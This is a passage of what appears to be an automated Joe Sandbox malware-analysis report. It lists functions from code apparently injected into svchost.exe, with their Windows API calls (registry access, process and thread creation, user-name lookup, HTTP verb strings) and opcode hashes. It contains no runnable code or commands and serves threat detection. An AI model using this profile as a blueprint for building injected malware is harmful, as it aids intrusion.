Uniqueness Score: -1.00%

Function 02694794 Relevance: 15.1, APIs: 10, Instructions: 143filesleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02694830
CreateEventW.KERNEL32(026962B8,00000000,00000000,?), ref: 02694852
CreateFileMappingW.KERNEL32(000000FF,026962B8,00000004,00000000,00000000,?), ref: 02694886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0269489D
SetEvent.KERNEL32(00000000), ref: 026948D9
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 026948EC
UnmapViewOfFile.KERNEL32(00000000), ref: 026948F3
CloseHandle.KERNEL32(?), ref: 02694903
CloseHandle.KERNEL32(?), ref: 02694910
CloseHandle.KERNEL32(00000000), ref: 02694917

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: de07c248163e980c867bb983ac02fb87f3b48ef589d5c7f8668444b8d4fb83ef
Instruction ID: ea2287749e7348f957221d2eb3e9075bc439351c1a51eaacae02d32b37acb49c
Opcode Fuzzy Hash: de07c248163e980c867bb983ac02fb87f3b48ef589d5c7f8668444b8d4fb83ef
Instruction Fuzzy Hash: DE41E472658385AFDB219F649845BABBBACFF85750F04081EF589C6281DF70C446CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02691CD5 Relevance: 12.1, APIs: 8, Instructions: 115memorysleepstringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02691CFD
RtlAllocateHeap.NTDLL(00000000), ref: 02691D04

Part of subcall function 02691F07: wsprintfA.USER32 ref: 02691F49

lstrcpy.KERNEL32(00000000,00000000), ref: 02691D2D
GetProcessHeap.KERNEL32(00000000,?), ref: 02691DF6
HeapFree.KERNEL32(00000000), ref: 02691DFD
Sleep.KERNEL32(00001388), ref: 02691E08
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02691E1A
HeapFree.KERNEL32(00000000), ref: 02691E21

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: ec6d2c039c2f40d843bf8910500291f391884a57b7b2c14fd8644d390e1f6f94
Instruction ID: dee267cec305e7b5de9c6abe191b7ab35765b84af7fbde2d1199d74d36b44d73
Opcode Fuzzy Hash: ec6d2c039c2f40d843bf8910500291f391884a57b7b2c14fd8644d390e1f6f94
Instruction Fuzzy Hash: DF418CB19043029FDB209F68D844B1BB7ECFF89314F14095EF199C2250DB70D514CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02691E38 Relevance: 12.1, APIs: 8, Instructions: 81memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,02691148,00000009,00000000,026971E0,00000007), ref: 02691E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,02691148,00000009,00000000,026971E0,00000007), ref: 02691E67
RtlAllocateHeap.NTDLL(00000000), ref: 02691E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 02691E97
CreateThread.KERNEL32(00000000,00000000,02691F56,00000000,00000000,00000000), ref: 02691EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,02691148,00000009,00000000,026971E0,00000007), ref: 02691EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,02691148,00000009,00000000,026971E0,00000007), ref: 02691EF3
HeapFree.KERNEL32(00000000,?,?,?,?,02691148,00000009,00000000,026971E0,00000007), ref: 02691EFA

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: 9b5b5d98143f4cd9a189cb45264c496c8fd9747ab97ee3024edae1f35bf74c89
Instruction ID: b730b15ce9730ddb69f3f951fdee3fb370fe368cee9a513bb330c01824ae9c8f
Opcode Fuzzy Hash: 9b5b5d98143f4cd9a189cb45264c496c8fd9747ab97ee3024edae1f35bf74c89
Instruction Fuzzy Hash: D221D17190074BAFDF128F75CC88A6BBBACFF06358B148958E849C6204DF70E815CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0269598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 026959D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 026959E8
RtlAllocateHeap.NTDLL(00000000), ref: 026959EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 02695A09
GetProcessHeap.KERNEL32(00000000,?), ref: 02695A1E
HeapFree.KERNEL32(00000000), ref: 02695A25
RegCloseKey.ADVAPI32(00000000), ref: 02695A2C

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: f5104d4493c68726cde0a3be46620b3a7bac0dbc3504470a65a6fd48ba1997df
Instruction ID: 187a2e85cf0785208d1be49f78a94adff865b1e4a84c0a20e15e3a35206a29eb
Opcode Fuzzy Hash: f5104d4493c68726cde0a3be46620b3a7bac0dbc3504470a65a6fd48ba1997df
Instruction Fuzzy Hash: DA31C3B1654341AFEB229F248C84B7BB7ACEF4A615F144818F986CB340DF74D806CB65

Uniqueness

Uniqueness Score: -1.00%

Function 026915D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 026915E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 026915FA
RtlAllocateHeap.NTDLL(00000000), ref: 02691601

Part of subcall function 026956E6: GetTempPathA.KERNEL32(00000104,?), ref: 026956F7

Part of subcall function 02692E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02692E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02691669
HeapFree.KERNEL32(00000000), ref: 02691670
GetProcessHeap.KERNEL32(00000000,?), ref: 02691683
HeapFree.KERNEL32(00000000), ref: 0269168A

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: 8ddcde1240d5a571aa2768ca2a7420cf63db6fe08cc5e0226a3050383311b17e
Instruction ID: 0aa6bf5c5ab40ded9c398c614cf726a7ef20140b1adf0f35af14fd831073db7d
Opcode Fuzzy Hash: 8ddcde1240d5a571aa2768ca2a7420cf63db6fe08cc5e0226a3050383311b17e
Instruction Fuzzy Hash: 8B11AFB2C54206BBEB025FA09C48F7EBB6CEB4B715F284859FA49C6140CF7494618F79

Uniqueness

Uniqueness Score: -1.00%

Function 02694E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,00000000,?,?,026949A2,00000000,00000000,?,00000000,00000000,026970E8), ref: 02694E70
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02694E77
CreateThread.KERNEL32(00000000,00000000,02694F6B,00000000,00000000,00000000), ref: 02694EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,026970E8), ref: 02694EB6
HeapFree.KERNEL32(00000000,?,00000000,00000000,026970E8), ref: 02694EBD
CloseHandle.KERNEL32(00000000,00000000,?,?,026949A2,00000000,00000000,?,00000000,00000000,026970E8), ref: 02694ECD
CloseHandle.KERNEL32(00000000,?,00000000,00000000,026970E8), ref: 02694EDF

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: c41174751ead1a09e78d6d4607aedfaa4dbed9c0a4af58c700b9e72e6ca5f64f
Instruction ID: b1019e06ca169786cb01332f2980b8bcd9def9f78b7401a1c5788518cec95d54
Opcode Fuzzy Hash: c41174751ead1a09e78d6d4607aedfaa4dbed9c0a4af58c700b9e72e6ca5f64f
Instruction Fuzzy Hash: F7110871E5532267DF224E745C0DF2BBB5DAF8AA11F094A19F941DA288CF60C8138AE0

Uniqueness

Uniqueness Score: -1.00%

Function 026958A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02692EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02692D76,?,?,?,?), ref: 02692ED5

memset.MSVCRT ref: 026958E2
lstrcpyW.KERNEL32(?,026963B4), ref: 0269590D
lstrcatW.KERNEL32(?,0269764C), ref: 0269591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0269593B
ExitProcess.KERNEL32 ref: 02695946

Strings

D, xrefs: 026958EA

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 9930adf94fb5268e37fa53fad6a4cd000340327917ea6928d7eea286fec9c7c0
Instruction ID: 100e176e19f0a3ec6f559f1a4cfc463d8ee7a417afadddb18d9e7877317326ef
Opcode Fuzzy Hash: 9930adf94fb5268e37fa53fad6a4cd000340327917ea6928d7eea286fec9c7c0
Instruction Fuzzy Hash: EF113CB2900248AFDF119FE4DC49FAE77BCEF44715F008465BA09D6140EE349A648B69

Uniqueness

Uniqueness Score: -1.00%

Function 02693BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02693BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 02693C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 02693CB5
HeapFree.KERNEL32(00000000), ref: 02693CEB
HeapFree.KERNEL32(00000000), ref: 02693D00

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: f78a6337f20bb81daea23236c4732eb613e04caa7ad188c062d8357e58381fff
Instruction ID: 079482af8b3ec18f094b5b242136ee90e771bb6a087271bf52a9b68ea534aacc
Opcode Fuzzy Hash: f78a6337f20bb81daea23236c4732eb613e04caa7ad188c062d8357e58381fff
Instruction Fuzzy Hash: 9D31D2B1648755EFEF259E648C48F7BBA9CEF44B45F040859B946C6380EF20D8A4CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02695A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 02695ACA
RtlAllocateHeap.NTDLL(00000000), ref: 02695AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 02695B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02695B2F
HeapFree.KERNEL32(00000000), ref: 02695B36
RegCloseKey.ADVAPI32(?), ref: 02695B3D

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: 6e314eb640205f59c037d65cac163f5c7bfef3b24713312333e0cb9bff648f51
Instruction ID: 88c5beae9ef139288d18e16a7ed27db87dca7bfa3a3cc5cbe7e2dbf893b0ecd4
Opcode Fuzzy Hash: 6e314eb640205f59c037d65cac163f5c7bfef3b24713312333e0cb9bff648f51
Instruction Fuzzy Hash: 24216DB2A443545BCB335E749C94B3BBB6CDF89910F444519FA839B345DEB0D80587A0

Uniqueness

Uniqueness Score: -1.00%

Function 02692482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 026924B4
lstrlen.KERNEL32(00000000), ref: 026924D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02692524
HeapFree.KERNEL32(00000000), ref: 0269252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0269254C
HeapFree.KERNEL32(00000000), ref: 02692553

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: 59604b7253ead47d8aa1fb6cef89cd275a81333a38d8590b914e26fb3b21c53b
Instruction ID: df1b3b89c632d364d8eba41b002310377139a5571f4f8945dda89ba928ecd1ac
Opcode Fuzzy Hash: 59604b7253ead47d8aa1fb6cef89cd275a81333a38d8590b914e26fb3b21c53b
Instruction Fuzzy Hash: AF214CB2C01209FBEF11DFE0D9187AEBABDBF05726F201469D900A2180DF744A95CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026938A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 026938B8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 026938D6
RtlAllocateHeap.NTDLL(00000000), ref: 026938DD
_vsnprintf.MSVCRT ref: 026938F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0269390C
HeapFree.KERNEL32(00000000), ref: 02693913

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: 7e86077aa7fa73347ee05ed06de3e8dd004b87e2f92dc7e8bdd79d4c5290ab31
Instruction ID: b9d1b321b4f121fb3b672f7545539698f432532c48f7c2cf0c4b1792b42dfae5
Opcode Fuzzy Hash: 7e86077aa7fa73347ee05ed06de3e8dd004b87e2f92dc7e8bdd79d4c5290ab31
Instruction Fuzzy Hash: A9017CB2540209BFDB126FA48C05FBB766CEB45650F044869FE16C6240FE30D9228B60

Uniqueness

Uniqueness Score: -1.00%

Function 02694423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(026930CE,00000000,?,026930CE,?), ref: 02694433
GetProcessHeap.KERNEL32(00000008), ref: 02694447
RtlAllocateHeap.NTDLL(00000000), ref: 0269444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 02694465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02694471
HeapFree.KERNEL32(00000000), ref: 02694478

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: 3d3a989eec406103378b2f5ea106eb9dd8b07f4167fb2a331ae86d7a0b0781b2
Instruction ID: 09240564d594dbce70ef666f947ca6e534e29ac0269d0881fdf5ecf0db16842a
Opcode Fuzzy Hash: 3d3a989eec406103378b2f5ea106eb9dd8b07f4167fb2a331ae86d7a0b0781b2
Instruction Fuzzy Hash: B1F04FB1955152ABDB220F26AC0CE6FBE6CEFC7B26B059918F445C2204DF309457DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 026916FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,026917FB,00000001), ref: 02691708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 02691722
RtlAllocateHeap.NTDLL(00000000), ref: 02691729
ExpandEnvironmentStringsA.KERNEL32(0269138F,00000000,-00000040), ref: 0269173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02691747
HeapFree.KERNEL32(00000000), ref: 0269174E

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: 846beae511ea067c83da0da86ffd5203f9b937c68f7c552810cb661887e99fb1
Instruction ID: 4a75bfe0f80c82d1a6bba87241848ca9b137a92c5cf559148a1fbbe9b5fe7111
Opcode Fuzzy Hash: 846beae511ea067c83da0da86ffd5203f9b937c68f7c552810cb661887e99fb1
Instruction Fuzzy Hash: 44F024B1A4420367CB220F34AC0CF4F7AACABCB611F190850F949CA244DF31C8518A60

Uniqueness

Uniqueness Score: -1.00%

Function 02693332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,026960A0), ref: 0269333C
QueryPerformanceCounter.KERNEL32(?), ref: 0269334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 02693372
GetTickCount.KERNEL32 ref: 0269337A

Strings

&%c=%u, xrefs: 02693332

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: a5ef82fba008d9be8a9fce1efc5046b188901bdc42eb88a4178c7b6dfb8d8277
Instruction ID: 004ab1b3777a08495b4ae7f8a785c402325f96f76db0fe003eddc5990c3f4768
Opcode Fuzzy Hash: a5ef82fba008d9be8a9fce1efc5046b188901bdc42eb88a4178c7b6dfb8d8277
Instruction Fuzzy Hash: C2F01771EA0148EBDF11DFE4D849AADBBBDFB44301F044894F506E2350DF31AA608B11

Uniqueness

Uniqueness Score: -1.00%

Function 0269175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 02691784

Part of subcall function 026916FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,026917FB,00000001), ref: 02691708

GetProcessHeap.KERNEL32(00000000,?), ref: 0269180F
HeapFree.KERNEL32(00000000), ref: 02691816

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: a5ab1b76e66649ef51c6fdf52a0968543dc6b9739a64bd58de0d9385ac69316b
Instruction ID: a82e2353b62c47989d27811e658fe3e580062e0f7ec79043b1664619e2a214d3
Opcode Fuzzy Hash: a5ab1b76e66649ef51c6fdf52a0968543dc6b9739a64bd58de0d9385ac69316b
Instruction Fuzzy Hash: 7331F2766183039FEF1A9F649844B7A77ECEF46250F2404AEF489CA244EF31C442CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02695348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02695367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,026950BA,00000000), ref: 0269537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,026950BA,00000000), ref: 0269538C
RtlAllocateHeap.NTDLL(00000000), ref: 02695393
lstrcpy.KERNEL32(00000000,?), ref: 026953A3

Part of subcall function 02694543: StrStrIA.SHLWAPI(?,?,?,?,0269712C,026962E4,02697224,?), ref: 02694563

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: 60998e34c2f5ff36cca6ed8a9c40fa7864bb9090486d9c9c185aa22598e6b794
Instruction ID: c5ae63320d138a68ae4d9326dbebaad69e78dc0ed6a56478fb7d496f46001c44
Opcode Fuzzy Hash: 60998e34c2f5ff36cca6ed8a9c40fa7864bb9090486d9c9c185aa22598e6b794
Instruction Fuzzy Hash: D21181B2D5412D6FEF02EBE0DC45CFFB7ACEF05714B04041AF902D6104EE6096568BA9

Uniqueness

Uniqueness Score: -1.00%

Function 02693763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,026936F0,02691134,?), ref: 0269378E
RtlAllocateHeap.NTDLL(00000000,?,026936F0), ref: 02693795
_vsnprintf.MSVCRT ref: 026937AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,026936F0,02691134,?), ref: 026937EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,026936F0,02691134,?), ref: 026937F3

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: e90ff21d1592055634e41935c5ecc5e1fabaf9ee74d030cc6264d67a981a8723
Instruction ID: 376bc7177d81d399d81470d81964aceb257449ffc3cf9cee8220ef6f1f634b91
Opcode Fuzzy Hash: e90ff21d1592055634e41935c5ecc5e1fabaf9ee74d030cc6264d67a981a8723
Instruction Fuzzy Hash: F001C8B2584202BFDF122FB4EC05F6B7A6EEF85760F044868FA0485314EE3288719B65

Uniqueness

Uniqueness Score: -1.00%

Function 02694F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02694F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02694F84
CloseHandle.KERNEL32(00000000), ref: 02694F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 02694FB5
HeapFree.KERNEL32(00000000), ref: 02694FBC

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: 0aca4aa2cd291a4b814801b53da82481131aa82a5e0590dfb09b05c8a129d082
Instruction ID: 9512cc92e3b7a2fed4e2db813993559d50a340f22107bbf7244d5001fadd745e
Opcode Fuzzy Hash: 0aca4aa2cd291a4b814801b53da82481131aa82a5e0590dfb09b05c8a129d082
Instruction Fuzzy Hash: 18F0B472C4512ABBDF225FA0DC08B9EBB6CEF05725F004714F90595154DF304A628BD1

Uniqueness

Uniqueness Score: -1.00%

Function 026921C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 02692225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 0269225A
RtlAllocateHeap.NTDLL(00000000), ref: 02692261

Strings

f<v, xrefs: 026923B0

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: 32c0d9b52ef1fe3d8f75b863b3639deba023bc114577b082b40ae48d4a32a0cd
Instruction ID: 8ad682c19a68ed290232cae28aaeac40a81b49bab408dedfadabfe4d170e5588
Opcode Fuzzy Hash: 32c0d9b52ef1fe3d8f75b863b3639deba023bc114577b082b40ae48d4a32a0cd
Instruction Fuzzy Hash: 5781B0B2908351ABD721DF64DCA0A6BBBECAF45340F05486EFC8593250EF35D944CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0269315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 026932A2
RtlAllocateHeap.NTDLL(00000000), ref: 026932AF

Strings

POST, xrefs: 026931B9
GET, xrefs: 026931D0, 026931DC

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: 5d2fe3cef2be9d03dddfef620571fdb3889cc3795c1c98f1ded52ec813ef09b8
Instruction ID: 1a2215dcc12bef20e7967e61470699cb92fbf3a6e37fcad1fe33a310a0511dc0
Opcode Fuzzy Hash: 5d2fe3cef2be9d03dddfef620571fdb3889cc3795c1c98f1ded52ec813ef09b8
Instruction Fuzzy Hash: A9515AB1654346AFEB218F25DC84B2BBBECFB84614F08491DB996C2250DF34D8698B61

Uniqueness

Uniqueness Score: -1.00%

Function 02693923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 0269392F
memset.MSVCRT ref: 02693983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 026939B3

Strings

D, xrefs: 0269398B

Memory Dump Source

Source File: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, Offset: 02691000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2691000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: 15e96c79e5cee6aa3c156d6a97fe3b276a8a36f2e3c52cad014d9a460376613c
Instruction ID: 4a393a17bf76d2857a10e3af3c19df895132bcaa34dfd676dd7f508c5007a68d
Opcode Fuzzy Hash: 15e96c79e5cee6aa3c156d6a97fe3b276a8a36f2e3c52cad014d9a460376613c
Instruction Fuzzy Hash: 9011D5B2804319AFC711AF21DC04E5FBFACEF857A8F060A19FD5193250DB3299158FA2

Uniqueness

Uniqueness Score: -1.00%

Function 02694EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02694EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 02694F35

Part of subcall function 026949EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000), ref: 02694A7A
Part of subcall function 026949EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02694F4C,?,00000000,?,?,?), ref: 02694A81
